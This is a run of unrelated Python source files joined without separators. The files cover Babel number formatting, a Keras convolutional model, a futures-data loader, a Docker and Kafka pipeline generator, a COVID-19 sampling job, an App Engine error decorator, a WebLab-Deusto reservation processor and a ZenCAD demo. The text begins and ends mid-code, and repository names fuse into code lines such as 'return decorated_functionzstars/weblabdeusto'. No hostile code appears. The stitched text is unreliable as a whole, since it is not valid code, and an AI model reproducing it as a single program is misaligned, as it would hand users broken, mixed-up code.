digits :param format_type: the currency format type to use :param decimal_quantization: Truncate and round high-precision numbers to the format pattern. Defaults to `True`. """ locale = Locale.parse(locale) if format: pattern = parse_pattern(format) else: try: p = locale.currency_formats[format_type] pattern = NumberPattern( p.pattern, p.prefix, p.suffix, p.grouping, p.int_prec, p.frac_prec, p.exp_prec, p.exp_plus) except KeyError: raise UnknownCurrencyFormatError( "%r is not a known currency format type" % format_type) return pattern.apply( number, locale, currency=currency, currency_digits=currency_digits, decimal_quantization=decimal_quantization) def parse_pattern(pattern): """Parse number format patterns""" if isinstance(pattern, NumberPattern): return pattern def _match_number(pattern): rv = number_re.search(pattern) if rv is None: raise ValueError('Invalid number pattern %r' % pattern) return rv.groups() pos_pattern = pattern # Do we have a negative subpattern? if ';' in pattern: pos_pattern, neg_pattern = pattern.split(';', 1) pos_prefix, number, pos_suffix = _match_number(pos_pattern) neg_prefix, _, neg_suffix = _match_number(neg_pattern) else: pos_prefix, number, pos_suffix = _match_number(pos_pattern) neg_prefix = '-' + pos_prefix neg_suffix = pos_suffix if 'E' in number: number, exp = number.split('E', 1) else: exp = None if '@' in number: if '.' in number and '0' in number: raise ValueError('Significant digit patterns can not contain ' '"@" or "0"') if '.' in number: integer, fraction = number.rsplit('.', 1) else: integer = number fraction = '' def parse_precision(p): """Calculate the min and max allowed digits""" min = max = 0 for c in p: if c in '@0': min += 1 max += 1 elif c == '#': max += 1 elif c == ',': continue else: break return min, max int_prec = parse_precision(integer) frac_prec = parse_precision(fraction) if exp: exp_plus = exp.startswith('+') exp = exp.lstrip('+') exp_prec = parse_precision(exp) else: exp_plus = None exp_prec = None grouping = babel.numbers.parse_grouping(integer) return NumberPattern(pattern, (pos_prefix, neg_prefix), (pos_suffix, neg_suffix), grouping, int_prec, frac_prec, exp_prec, exp_plus) class NumberPattern(_NumberPattern): """Overriding babel.numbers.NumberPattern.apply to newer version.""" def apply( self, value, locale, currency=None, currency_digits=True, decimal_quantization=True): """Renders into a string a number following the defined pattern. Forced decimal quantization is active by default so we'll produce a number string that is strictly following CLDR pattern definitions. """ if not isinstance(value, decimal.Decimal): value = decimal.Decimal(str(value)) value = value.scaleb(self.scale) # Separate the absolute value from its sign. is_negative = int(value.is_signed()) value = abs(value).normalize() # Prepare scientific notation metadata. if self.exp_prec: value, exp, exp_sign = self.scientific_notation_elements( value, locale) # Adjust the precision of the fractionnal part and force it to the # currency's if neccessary. frac_prec = self.frac_prec if currency and currency_digits: frac_prec = (babel.numbers.get_currency_precision(currency), ) * 2 # Bump decimal precision to the natural precision of the number if it # exceeds the one we're about to use. This adaptative precision is only # triggered if the decimal quantization is disabled or if a scientific # notation pattern has a missing mandatory fractional part (as in the # default '#E0' pattern). This special case has been extensively # discussed at # https://github.com/python-babel/babel/pull/494#issuecomment-307649969 if not decimal_quantization or (self.exp_prec and frac_prec == (0, 0)): frac_prec = (frac_prec[0], max([frac_prec[1], get_decimal_precision(value)])) # Render scientific notation. if self.exp_prec: number = ''.join([ self._quantize_value(value, locale, frac_prec), babel.numbers.get_exponential_symbol(locale), exp_sign, self._format_int( str(exp), self.exp_prec[0], self.exp_prec[1], locale)]) # Is it a siginificant digits pattern? elif '@' in self.pattern: text = self._format_significant(value, self.int_prec[0], self.int_prec[1]) a, sep, b = text.partition(".") number = self._format_int(a, 0, 1000, locale) if sep: number += babel.numbers.get_decimal_symbol(locale) + b # A normal number pattern. else: number = self._quantize_value(value, locale, frac_prec) retval = ''.join([ self.prefix[is_negative], number, self.suffix[is_negative]]) if u'¤' in retval: retval = retval.replace(u'¤¤¤', babel.numbers.get_currency_name( currency, value, locale)) retval = retval.replace(u'¤¤', currency.upper()) retval = retval.replace(u'¤', babel.numbers.get_currency_symbol( currency, locale)) return retval def _quantize_value(self, value, locale, frac_prec): quantum = get_decimal_quantum(frac_prec[1]) rounded = value.quantize(quantum) a, sep, b = str(rounded).partition(".") number = (self._format_int(a, self.int_prec[0], self.int_prec[1], locale) + self._format_frac(b or '0', locale, frac_prec)) return number def scientific_notation_elements(self, value, locale): """ Returns normalized scientific notation components of a value.""" # Normalize value to only have one lead digit. exp = value.adjusted() value = value * get_decimal_quantum(exp) assert value.adjusted() == 0 # Shift exponent and value by the minimum number of leading digits # imposed by the rendering pattern. And always make that number # greater or equal to 1. lead_shift = max([1, min(self.int_prec)]) - 1 exp = exp - lead_shift value = value * get_decimal_quantum(-lead_shift) # Get exponent sign symbol. exp_sign = '' if exp < 0: exp_sign = babel.numbers.get_minus_sign_symbol(locale) elif self.exp_plus: exp_sign = babel.numbers.get_plus_sign_symbol(locale) # Normalize exponent value now that we have the sign. exp = abs(exp) return value, exp, exp_sign def get_decimal_quantum(precision): """Return minimal quantum of a number, as defined by precision.""" assert isinstance(precision, (int, decimal.Decimal)) return decimal.Decimal(10) ** (-precision) def get_decimal_precision(number): """Return maximum precision of a decimal instance's fractional part. Precision is extracted from the fractional part only. """ # Copied from: https://github.com/mahmoud/boltons/pull/59 assert isinstance(number, decimal.Decimal) decimal_tuple = number.normalize().as_tuple() if decimal_tuple.exponent >= 0: return 0 return abs(decimal_tuple.exponent) mirgee/thesis_project0 import keras as k import numpy as np import tensorflow as tf def temp_model( imsize=256, n_classes=2, input_time_length=256, final_conv_length='auto', n_filters_1=25, filter_length_1=10, n_filters_2=50, filter_length_2=5, n_filters_3=100, filter_length_3=5, n_filters_4=200, filter_length_4=5, pool_length=3, pool_stride=3, first_nonlin=k.activations.relu, first_pool_mode='max', first_pool_nonlin=(lambda x: x), later_nonlin=k.activations.relu, later_pool_mode='max', later_pool_nonlin=(lambda x: x), drop_prob=0.5, batch_norm=True, batch_norm_alpha=0.1, stride_before_pool=False, ): if stride_before_pool: conv_stride = pool_stride pool_stride = 1 else: conv_stride = 1 pool_stride = pool_stride pool_class_dict = dict(max=k.layers.MaxPool2D, mean=k.layers.AvgPool2D) # AvgPool2dWithConv) first_pool_class = pool_class_dict[first_pool_mode] later_pool_class = pool_class_dict[later_pool_mode] inp = k.layers.Input((imsize, imsize, 1), name='input') layer = k.layers.Conv2D( filters=n_filters_1, kernel_size=(filter_length_1, filter_length_1), use_bias=not batch_norm, kernel_initializer=k.initializers.glorot_uniform(), bias_initializer='zeros', data_format='channels_last', input_shape=(imsize, imsize, 1), name='conv_1' )(inp) if batch_norm: layer = k.layers.BatchNormalization( axis=-1, momentum=batch_norm_alpha, epsilon=1e-5, name='batch_norm_1', )(layer) layer = k.layers.Activation(first_nonlin, name='nonlin_1')(layer) layer = first_pool_class( pool_size=(pool_length, pool_length), strides=(pool_stride, pool_stride), name='pool_1' )(layer) layer = k.layers.Lambda(first_pool_nonlin, name='pool_nonlin_1')(layer) def add_conv_pool_block(layer, n_filters, filter_length, block_nr): suff = '_{:d}'.format(block_nr) layer = k.layers.Dropout(drop_prob, name='drop'+suff)(layer) layer = k.layers.Conv2D( filters=n_filters, kernel_size=(filter_length, filter_length), # Not sure strides=(conv_stride, conv_stride), # Not sure use_bias=not batch_norm, kernel_initializer=k.initializers.glorot_uniform(), bias_initializer='zeros', name='conv'+suff )(layer) if batch_norm: layer = k.layers.BatchNormalization( axis=-1, momentum=batch_norm_alpha, epsilon=1e-5, name='batch_norm'+suff, # There are other default params which may be diff. from orig. )(layer) layer = k.layers.Activation(later_nonlin, name='nonlin'+suff)(layer) layer = later_pool_class( pool_size=(pool_length, pool_length), strides=(pool_stride, pool_stride), name='pool'+suff )(layer) layer = k.layers.Lambda(later_pool_nonlin, name='pool_nonlin'+suff)(layer) return layer layer = add_conv_pool_block(layer, n_filters_2, filter_length_2, 2) layer = add_conv_pool_block(layer, n_filters_3, filter_length_3, 3) layer = add_conv_pool_block(layer, n_filters_4, filter_length_4, 4) # layer = add_conv_pool_block(layer, n_filters_5, filter_length_5, 5) # layer = k.layers.Flatten()(layer) # layer = k.layers.Dense(32, activation='elu')(layer) # # layer = k.layers.Dense(n_classes, activation='softmax')(layer) if final_conv_length == 'auto': final_conv_length = int(layer.shape[2]) layer = k.layers.Conv2D( filters=n_classes, kernel_size=(final_conv_length, final_conv_length), use_bias=True, activation= 'softmax', kernel_initializer=k.initializers.glorot_uniform(), bias_initializer='zeros', name='conv_classifier' )(layer) # layer = k.layers.Softmax(axis=-1, name='softmax')(layer) layer = k.layers.Lambda(lambda x: x[:,0,0,:], name='squeeze')(layer) model = k.models.Model(inp, layer) # model.compile( # optimizer=k.optimizers.SGD(lr=0.001, momentum=0.99, decay=1e-5, nesterov=True), # loss=k.losses.binary_crossentropy, # metrics=['accuracy'], # loss_weights=None, # sample_weight_mode=None, # weighted_metrics=None, # target_tensors=None # ) return model utils extention (getData func).py0 def getData(): dataset = pd.read_csv('FUTURES MINUTE.txt', header = None) dataset.columns = ['Date','time',"1. open","2. high",'3. low','4. close','5. volume'] dataset['date'] = dataset['Date'] +" "+ dataset['time'] dataset.drop('Date', axis=1, inplace=True) dataset.drop('time', axis=1, inplace=True) dataset['date'] = dataset['date'].apply(lambda x: pd.to_datetime(x, errors='ignore')) dataset['date'] = dataset['date'].apply(lambda x: datetime.datetime.strftime(x, '%Y-%m-%d %H:%M:%S')) dataset.set_index(dataset.index.map(lambda x: pd.to_datetime(x, errors='ignore'))) dataset.set_index('date',inplace=True) return dataset import os import json from pathlib import Path """ Example: Pipeline( id = 'test-id', nodes = { Node( id = 'node1', path = './module1', params = {}, inputs = [], outputs = ['node2'] ), Node( id = 'node2', path = './module2', params = {}, inputs = ['node1'], outputs = [] ), } ) """ class Pipeline2(object): def __init__(self, id, nodes=[]): self.id = id self.nodes = nodes self.tab_size = 2 def __tabs(self, count): tab = ''.join([' ' for _ in range(self.tab_size)]) return ''.join([tab for _ in range(count)]) def __parse_settings(self, path): # Default settings settings = { 'use_custom_dockerfile': False } path = str(path.parent) if os.path.exists(path + "/settings.txt"): with open(path + "/settings.txt", 'r') as f: line = f.readline().strip() while line: pair = line.split("=") if pair[0].strip() == "use_custom_dockerfile": settings['use_custom_dockerfile'] = bool(pair[1].lower().strip()) line = f.readline().strip() return settings def __export_params(self, node, path): params = node.params if "topics_in" not in params: params["topics_in"] = [i + "-" + node.id for i in node.inputs] if "topics_out" not in params: params["topics_out"] = [node.id + "-" + o for o in node.outputs] if "servers_in" not in params: params["servers_in"] = "kafka0:29092" if "servers_out" not in params: params["servers_out"] = "kafka0:29092" if "session_timeout_ms" not in params: params["session_timeout_ms"] = 10000 if "auto_offset_reset" not in params: params["auto_offset_reset"] = "earliest" if "group_id" not in params: params["group_id"] = self.id path = str(path.parent) with open(path + "/params.json", 'w') as f: json.dump(params, f) def __generate_dockerfile(self, path): with open(str(path.parent) + "/Dockerfile", 'w') as f: f.write("FROM ubuntu:latest\n") f.write("\n") f.write("RUN apt-get update\n") f.write("RUN apt-get install -y python3.7 python3-pip python3-dev\n") f.write("RUN apt-get install -y git\n") f.write("RUN pip3 install --upgrade pip\n") f.write("\n") f.write("WORKDIR /usr/src/app\n") f.write("COPY . .\n") f.write("RUN pip3 install -r requirements.txt\n") # I'm not sure why it isn't upgrading. uninstall -> reinstall is the temporary fix f.write("RUN pip3 uninstall hummingbird\n") f.write("RUN pip3 install --upgrade git+https://github.com/richardycao/hummingbird_python.git#egg=hummingbird\n") f.write("\n") f.write("CMD python3 " + path.name) def __generate_docker_compose(self, path): with open('./docker-compose-' + str(self.id) + '.yml', 'w') as f: f.write("version: '3.7'\n") f.write("\n") f.write("services:\n") for node in reversed(self.nodes): path = Path(node.path) container_name = node.id f.write(self.__tabs(1) + container_name + ":\n") f.write(self.__tabs(2) + "build: " + str(path.parent) + "\n") f.write(self.__tabs(2) + "container_name: " + container_name + "\n") f.write(self.__tabs(2) + "environment:\n") f.write(self.__tabs(3) + "- \"PYTHONUNBUFFERED=1\"\n") if len(node.outputs) > 0: f.write(self.__tabs(2) + "depends_on:\n") for output_id in node.outputs: f.write(self.__tabs(3) + "- " + output_id + "\n") def build(self): for node in self.nodes: path = Path(node.path) settings = self.__parse_settings(path) # Does this work if there isn't a settings file? self.__export_params(node, path) if not settings['use_custom_dockerfile']: self.__generate_dockerfile(path) self.__generate_docker_compose(path) os.system('docker-compose -f docker-compose-kafka.yml build') os.system('docker-compose -f docker-compose-' + str(self.id) + '.yml build') def run(self): # Maybe this part should be done manually. Leave it blank for now. # Run Kafka docker # Wait # Run pipeline docker pass # -*- coding: utf-8 -*- import itertools as it import pickle as pkl import os from collections import OrderedDict from sampling_utils import * from shared_utils import * disease = "covid19" nums_sample = range(100) GID = int(os.environ["SGE_TASK_ID"]) num_sample = nums_sample[GID - 1] filename = "../data/ia_effect_samples/{}_{}.pkl".format(disease, num_sample) print("Running task {} - disease: {} - sample: {}\nWill create file {}".format(GID, disease, num_sample, filename)) with open('../data/counties/counties.pkl', "rb") as f: counties = pkl.load(f) prediction_region = "germany" parameters = OrderedDict() # Load data data = load_daily_data(disease, prediction_region, counties) # samples random times --> check the data conversion carefully # check if correct times = uniform_times_by_day(data.index) locs = uniform_locations_by_county(counties) #NOTE: Do we want basis functions with a longer temporal horizon? def temporal_bfs(x): return bspline_bfs(x, np.array( [0, 0, 1, 2, 3, 4, 5]) * 24 * 3600.0, 2) def spatial_bfs(x): return [gaussian_bf(x, σ) for σ in [6.25, 12.5, 25.0, 50.0]] samp = IAEffectSampler(data, times, locs, temporal_bfs, spatial_bfs, num_tps=10, time_horizon=5) res = samp(data.index, data.columns) results = {"ia_effects": res, "predicted day": data.index, "predicted county": data.columns} with open(filename, "wb") as file: pkl.dump(results, file) 1-10 ''' Copyright 2011 Acknack Ltd Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. ''' ''' Decorator to intercept exceptions and handle them nicely ''' import logging import friendlyCodes as eCodes import output as eOutput import rayExceptions from waveto import waveRpc from waveapi import simplejson from google.appengine.runtime import DeadlineExceededError class interceptExceptions(object): ''' Decorator to process exceptions that can be recovered from. If an exception is raised the appropriate page or error code is returned to the user @param function: the function to call @return the function to return @condition: the first arg must be the webapp.RequestHandler instance ''' def __init__(self, render_page): ''' @param render_page: set to true if this method is rendering a page, false if it is answering an ajax call ''' self.render_page = render_page def __call__(self, function): def decorated_function(*args, **kwargs): handler = args[0] try: return function(*args, **kwargs) except DeadlineExceededError: logging.warn("Deadline Exceeded for request") if self.render_page: return eOutput.DeadlineExceeded(handler).RenderPage(eCodes.REQUEST_DEADLINE_ERR) else: return eOutput.DeadlineExceeded(handler).ReturnResponse() except waveRpc.DownloadException: logging.warn("Could not download wave from google servers") if self.render_page: return eOutput.WaveRpcDownloadProblem(handler).RenderPage(eCodes.CANNOT_CONNECT_TO_WAVE_ERR) else: return eOutput.WaveRpcDownloadProblem(handler).ReturnResponse() except waveRpc.NotParticipantException: logging.warn("Mr-Ray not participant of wave") if self.render_page: return eOutput.RayNotWaveParticipant(handler).RenderPage(eCodes.BOT_NOT_PARTICIPANT_ERR) else: return eOutput.RayNotWaveParticipant(handler).ReturnResponse() except simplejson.decoder.JSONDecodeError: logging.warn("Could not decode incoming json") return eOutput.JsonDecodingProblem(handler).ReturnResponse() except rayExceptions.MalformedRequest: logging.warn("The request was malformed in some way") return eOutput.MalformedRequest(handler).ReturnResponse() except Exception, ex: logging.exception("Unknown error") if self.render_page: return eOutput.UnknownProblem(handler).RenderPage(eCodes.UNKNOWN_ERR) else: return eOutput.UnknownProblem(handler).ReturnResponse() return decorated_functionzstars/weblabdeusto #!/usr/bin/env python #-*-*- encoding: utf-8 -*-*- # # Copyright (C) 2005 onwards University of Deusto # All rights reserved. # # This software is licensed as described in the file COPYING, which # you should have received as part of this distribution. # # This software consists of contributions made by many individuals, # listed below: # # Author: <> # <> # import random import time as time_module import voodoo.log as log import weblab.configuration_doc as configuration_doc import weblab.data.server_type as ServerType import weblab.data.command as Command import weblab.core.exc as core_exc import weblab.core.reservations as Reservation from weblab.core.file_storer import FileStorer import weblab.core.coordinator.exc as coord_exc import weblab.core.coordinator.status as scheduling_status import weblab.core.coordinator.store as TemporalInformationStore import weblab.lab.exc as LaboratoryErrors DEFAULT_EXPERIMENT_POLL_TIME = 350 # seconds EXPERIMENT_POLL_TIME = 'core_experiment_poll_time' class ReservationProcessor(object): """ This class encapsulates the methods of the user dependent on the interaction with the experiment. This is a middle step before moving this class to the proxy server. Previously, all these methods were implemented in the UserProcessor class, but all methods here only rely on the reservation_id (instead of relying on the session_id). The difference is that it will be possible to handle more than one concurrent reservation with the same session (which is desirable when using calendars), and it will be possible to provide a reservation_id (that can interact with the experiment) without compromising the rest of the session. """ EXPIRATION_TIME_NOT_SET=-1234 def __init__(self, cfg_manager, reservation_id, reservation_session, coordinator, locator, commands_store): self._cfg_manager = cfg_manager self._reservation_session_id = reservation_id self._reservation_id = reservation_id.id self._reservation_session = reservation_session self._coordinator = coordinator self._locator = locator self._commands_store = commands_store self.time_module = time_module # The response to asynchronous commands is not immediately available, so we need to # use this map to store the ids of the usage objects (commands sent), identified through # their request_ids (which are not the same). As their responses become available, we will # use the request_ids to find the ids of the usage objects, and update them. # # It seems that the UserProcessor is re-created rather often, so we cannot store # usage-related information locally. We will store it in the session object instead. # TODO: As of now, if the async_commands_ids is not in session we will initialize it. # Probably that initialization should be moved to wherever session is initialized. if not "async_commands_ids" in self._reservation_session: self._reservation_session["async_commands_ids"] = {} def get_session(self): return self._reservation_session def get_reservation_session_id(self): return self._reservation_session_id def get_reservation_id(self): return self._reservation_id def get_info(self): return self._reservation_session['experiment_id'] ############################################################################## # # # STATUS MANAGEMENT # # def get_status(self): """ get_status() -> Reservation It returns the state of the reservation (such as "you're waiting in a queue", "the experiment is being initialized", "you have the reservation available", etc.) """ try: status = self._coordinator.get_reservation_status( self._reservation_id ) except coord_exc.ExpiredSessionError as e: log.log(ReservationProcessor, log.level.Debug, "reason for rejecting:") log.log_exc(ReservationProcessor, log.level.Debug) human = self._cfg_manager.get_doc_value(configuration_doc.CORE_UNIVERSAL_IDENTIFIER_HUMAN) core_id = self._cfg_manager.get_doc_value(configuration_doc.CORE_UNIVERSAL_IDENTIFIER) raise core_exc.NoCurrentReservationError("get_reservation_status at %s (%s) called but coordinator rejected reservation id (%s). Reason: %s" % (human, core_id, self._reservation_id, str(e))) else: if status.status == scheduling_status.WebLabSchedulingStatus.RESERVED_LOCAL: self.process_reserved_status(status) if status.status == scheduling_status.WebLabSchedulingStatus.RESERVED_REMOTE: self.process_reserved_remote_status(status) return Reservation.Reservation.translate_reservation( status ) def process_reserved_status(self, status): if 'lab_session_id' in self._reservation_session: return # Already called in the past self._reservation_session['lab_session_id'] = status.lab_session_id self._reservation_session['lab_coordaddr'] = status.coord_address if status.exp_info.get('manages_polling', False): self.disable_polling() # TODO: it should not be time_module.time, but retrieve this information # from the status manager to know when it started self._renew_expiration_time( self.time_module.time() + status.time ) def process_reserved_remote_status(self, status): self._reservation_session['federated'] = True def disable_polling(self): self._reservation_session['manages_polling'] = True def finish(self): """ Called when the experiment ends, regardless of the way. (That is, it does not matter whether the user finished it explicitly or not). """ # If already finished, exit if not self.is_polling(): return self._stop_polling() self._reservation_session.pop('lab_session_id', None) try: self._coordinator.finish_reservation(self._reservation_id) except Exception as e: log.log( ReservationProcessor, log.level.Error, "Exception finishing reservation: %s" % e ) log.log_exc( ReservationProcessor, log.level.Warning ) raise core_exc.FailedToFreeReservationError( "There was an error freeing reservation: %s" % e) def update_latest_timestamp(self): """ Used in weblab.admin.monitor to check the status of current users """ self._reservation_session['latest_timestamp'] = self._utc_timestamp() ############################################################################## # # # POLLING MANAGEMENT # # # Whenever the experiment finishes, the server notifies the Reservation # Processor. Polling is therefore only required to kick those users that # are not using the experiment for a long time. # # The variable is created when the reservation is created. It is removed # when the experiment finishes. # # TODO: the reservation system should tell the processor whether this # experiments expects polling or not. # def is_polling(self): """ Is this user in a queue or using an experiment, and therefore it should be continuosly informing that it is alive? Otherwise, weblab will kick him. """ return 'session_polling' in self._reservation_session def is_federated(self): return self._reservation_session.get('federated', False) def manages_polling(self): return self._reservation_session.get('manages_polling', False) def _renew_expiration_time(self, expiration_time): if self.is_polling(): self._reservation_session['session_polling'] = ( self.time_module.time(), expiration_time ) def poll(self): """Inform that it is still online and interested on the reservation""" if not self.is_polling(): raise core_exc.NoCurrentReservationError("poll called but no current reservation") latest_poll, expiration_time = self._reservation_session['session_polling'] self._reservation_session['session_polling'] = ( self.time_module.time(), expiration_time ) def is_expired(self): """Did this reservation's user stay out for a long time without polling?""" # If it has been assigned to a laboratory that explicitly requests to avoid # using polling, then it is only expired when the particular laboratory # states that it is expired. if self.manages_polling(): return False # If it has been assigned in a foreign server, then, it is never expired if self.is_federated(): return False # If it is not polling, it was expired in the past if not self.is_polling(): return True # # But if it polling and it hasn't polled in some time # current_time = self.time_module.time() latest_poll, expiration_time = self._reservation_session['session_polling'] if current_time - latest_poll > self._cfg_manager.get_value(EXPERIMENT_POLL_TIME, DEFAULT_EXPERIMENT_POLL_TIME): return True elif expiration_time != ReservationProcessor.EXPIRATION_TIME_NOT_SET and current_time > expiration_time: return True return False def _stop_polling(self): if self.is_polling(): self._reservation_session.pop('session_polling') ############################################################################## # # # SENDING COMMANDS AND FILES # ######################### # # Communications # def send_file(self, file_content, file_info ): # # Check that the reservation is enabled # lab_session_id = self._reservation_session.get('lab_session_id') lab_coordaddr = self._reservation_session.get('lab_coordaddr') if lab_session_id is None or lab_coordaddr is None: raise core_exc.NoCurrentReservationError("send_file called but the reservation was not enabled") # # Retrieve the laboratory server # usage_file_sent = self._store_file(file_content, file_info) command_id_pack = self._append_file(usage_file_sent) try: laboratory_server = self._locator[lab_coordaddr] response = laboratory_server.send_file( lab_session_id, file_content, file_info ) self._update_command_or_file(command_id_pack, response) return response except LaboratoryErrors.SessionNotFoundInLaboratoryServerError: self._update_command_or_file(command_id_pack, Command.Command("ERROR: SessionNotFound")) try: self.finish() except core_exc.FailedToFreeReservationError: pass raise core_exc.NoCurrentReservationError( 'Experiment reservation expired' ) except LaboratoryErrors.FailedToInteractError as ftie: self._update_command_or_file(command_id_pack, Command.Command("ERROR: " + str(ftie))) try: self.finish() except core_exc.FailedToFreeReservationError: pass raise core_exc.FailedToInteractError( "Failed to send: %s" % ftie ) def send_command(self, command): # # Check the that the experiment is enabled # lab_session_id = self._reservation_session.get('lab_session_id') lab_coordaddr = self._reservation_session.get('lab_coordaddr') if lab_session_id is None or lab_coordaddr is None: raise core_exc.NoCurrentReservationError("send_command called but the reservation is not enabled") command_id_pack = self._append_command(command) try: laboratory_server = self._locator[lab_coordaddr] # We call the laboratory server's send_command, which will finally # get the command to be handled by the experiment. response = laboratory_server.send_command( lab_session_id, command ) # The previous call was executed synchronously and we have # received the response. Before returning it, we will store it # locally so that we can log it. self._update_command_or_file(command_id_pack, response) return response except LaboratoryErrors.SessionNotFoundInLaboratoryServerError: self._update_command_or_file(command_id_pack, Command.Command("ERROR: SessionNotFound: None")) try: self.finish() except core_exc.FailedToFreeReservationError: pass raise core_exc.NoCurrentReservationError( 'Experiment reservation expired' ) except LaboratoryErrors.FailedToInteractError as ftspe: self._update_command_or_file(command_id_pack, Command.Command("ERROR: " + str(ftspe))) try: self.finish() except core_exc.FailedToFreeReservationError: pass raise core_exc.FailedToInteractError( "Failed to send command: %s" % ftspe ) def send_async_file(self, file_content, file_info ): """ Sends a file asynchronously. Status of the request may be checked through check_async_command_status. @param file_content: Content of the file being sent @param file_info: File information of the file being sent @see check_async_command_status """ lab_session_id = self._reservation_session.get('lab_session_id') lab_coordaddr = self._reservation_session.get('lab_coordaddr') if lab_session_id is None or lab_coordaddr is None: raise core_exc.NoCurrentReservationError("send_async_file called but no current reservation") usage_file_sent = self._store_file(file_content, file_info) command_id_pack = self._append_file(usage_file_sent) try: laboratory_server = self._locator[lab_coordaddr] response = laboratory_server.send_async_file( lab_session_id, file_content, file_info ) # TODO: how do we store async files? whenever somebody ask for the status? what if they don't ask for it? return response except LaboratoryErrors.SessionNotFoundInLaboratoryServerError: self._update_command_or_file(command_id_pack, Command.Command("ERROR: SessionNotFound: None")) try: self.finish() except core_exc.FailedToFreeReservationError: pass raise core_exc.NoCurrentReservationError( 'Experiment reservation expired' ) except LaboratoryErrors.FailedToInteractError as ftspe: self._update_command_or_file(command_id_pack, Command.Command("ERROR: " + str(ftspe))) try: self.finish() except core_exc.FailedToFreeReservationError: pass raise core_exc.FailedToInteractError( "Failed to send file: %s" % ftspe ) def check_async_command_status(self, request_identifiers): """ Checks the status of several asynchronous commands. The request will be internally forwarded to the lab server. Standard async commands and file_send commands are treated in the same way. Commands reported as finished (either successfully or not) will be removed, so check_async_command_status should not be called on them again. Before removing the commands, it will also register their response for logging purposes. @param request_identifiers: List of the identifiers to check @return: Dictionary by request-id of tuples: (status, content) """ lab_session_id = self._reservation_session.get('lab_session_id') lab_coordaddr = self._reservation_session.get('lab_coordaddr') if lab_session_id is None or lab_coordaddr is None: raise core_exc.NoCurrentReservationError("check_async_command called but no current reservation") try: laboratory_server = self._locator[lab_coordaddr] response = laboratory_server.check_async_command_status( lab_session_id, request_identifiers) # Within the response map, we might now have the real response to one # (or more) async commands. We will update the usage object of the # command with its response, so that once the experiment ends it appears # in the log as expected. for req_id, (cmd_status, cmd_response) in response.items(): #@UnusedVariable if(req_id in self._reservation_session["async_commands_ids"]): #usage_obj_id = self._reservation_session["async_commands_ids"][req_id] # TODO: Bug here. async_commands_ids is empty. # self._update_command_or_file(usage_obj_id, cmd_response) pass return response except LaboratoryErrors.SessionNotFoundInLaboratoryServerError: # We did not find the specified session in the laboratory server. # We'll finish the experiment. #self._update_command(command_id_pack, Command.Command("ERROR: SessionNotFound: None")) try: self.finish() except core_exc.FailedToFreeReservationError: pass raise core_exc.NoCurrentReservationError( 'Experiment reservation expired' ) except LaboratoryErrors.FailedToInteractError as ftspe: # There was an error while trying to send the command. # We'll finish the experiment. #self._update_command(command_id_pack, Command.Command("ERROR: " + str(ftspe))) try: self.finish() except core_exc.FailedToFreeReservationError: pass raise core_exc.FailedToInteractError( "Failed to send command: %s" % ftspe ) def send_async_command(self, command): """ Runs a command asynchronously. Status of the request may be checked through the check_async_command_status method. @param command The command to run @see check_async_command_status """ lab_session_id = self._reservation_session.get('lab_session_id') lab_coordaddr = self._reservation_session.get('lab_coordaddr') if lab_session_id is None or lab_coordaddr is None: raise core_exc.NoCurrentReservationError("send_async_command called but no current reservation") command_id_pack = self._append_command(command) try: laboratory_server = self._locator[lab_coordaddr] # We forward the request to the laboratory server, which # will forward it to the actual experiment. Because this is # an asynchronous call, we will not receive the actual response # to the command, but simply an ID identifying our request. This also # means that by the time this call returns, the real response to the # command is most likely not available yet. request_id = laboratory_server.send_async_command(lab_session_id, command) # If this was a standard, synchronous send_command, we would now store the response # we received, so that later, when the experiment finishes, the log is properly # written. However, the real response is not available yet, so we can't do that here. # Instead, we will store a reference to our usage object, so that we can later update it # when the response to the asynchronous command is ready. self._reservation_session["async_commands_ids"][request_id] = command_id_pack # TODO: when do we store async commands? whenever user asks for status? what if they don't ever ask? return request_id except LaboratoryErrors.SessionNotFoundInLaboratoryServerError: self._update_command_or_file(command_id_pack, Command.Command("ERROR: SessionNotFound: None")) try: self.finish() except core_exc.FailedToFreeReservationError: pass raise core_exc.NoCurrentReservationError( 'Experiment reservation expired' ) except LaboratoryErrors.FailedToInteractError as ftspe: self._update_command_or_file(command_id_pack, Command.Command("ERROR: " + str(ftspe))) try: self.finish() except core_exc.FailedToFreeReservationError: pass raise core_exc.FailedToInteractError( "Failed to send command: %s" % ftspe ) ############################################################################## # # # SENDING COMMANDS AND FILES # ######################### # # Storage. # No reference to session, only to _reservation_id # def _append_command(self, command): return self._append_command_or_file(command, True) def _append_file(self, command): return self._append_command_or_file(command, False) def _append_command_or_file(self, command, command_or_file): command_id = random.randint(0, 1000 * 1000 * 1000) timestamp = self._utc_timestamp() command_entry = TemporalInformationStore.CommandOrFileInformationEntry(self._reservation_id, True, command_or_file, command_id, command, timestamp) self._commands_store.put(command_entry) return command_id, command_or_file def _update_command_or_file(self, (command_id, command_or_file), response): timestamp = self._utc_timestamp() command_entry = TemporalInformationStore.CommandOrFileInformationEntry(self._reservation_id, False, command_or_file, command_id, response, timestamp) self._commands_store.put(command_entry) def _utc_timestamp(self): return self.time_module.time() def _store_file(self, file_content, file_info): storer = FileStorer(self._cfg_manager, self._reservation_id, self.time_module) return storer.store_file(file_content, file_info) #!/usr/bin/env python3 # coding: utf-8 from zencad import * m = circle(10) + square(17, center=True) m0 = m m1 = unify(m) m2 = m.extrude(10) m3 = unify(m).extrude(10) display(m0) display(m1.right(30)) display(m2.forw(30)) display(m3.right(30).forw(30)) show() 0 #!/usr/bin/env python3 import os import sys from filter_terms import * def main(args): global special_domains file_prefix = args[1] web_score_dict_file = args[2] if args[3].lower() in ['true','t']: use_web_score = True elif args[3].lower() in ['false','f']: use_web_score = False else: print('You set the webscore flag to', args[3], 'but it must be either "True" or "False".') print('Use "True" if you want the system to use the webscore function and the system will run slowly and be more accurate.') print('Use "False" otherwise.') max_term_number = int(args[4]) abbr_file_list = args[5] if (len(args)>6) and (args[6].lower() != 'false'): special_domains.extend(args[6].split('+')) initialize_utilities() input_file = file_prefix + ".all_terms" output_file = file_prefix + ".scored_output" abbr_full_file = file_prefix + ".dict_abbr_to_full" full_abbr_file = file_prefix + ".dict_full_to_abbr" reject_file = file_prefix + ".rejected-terms" 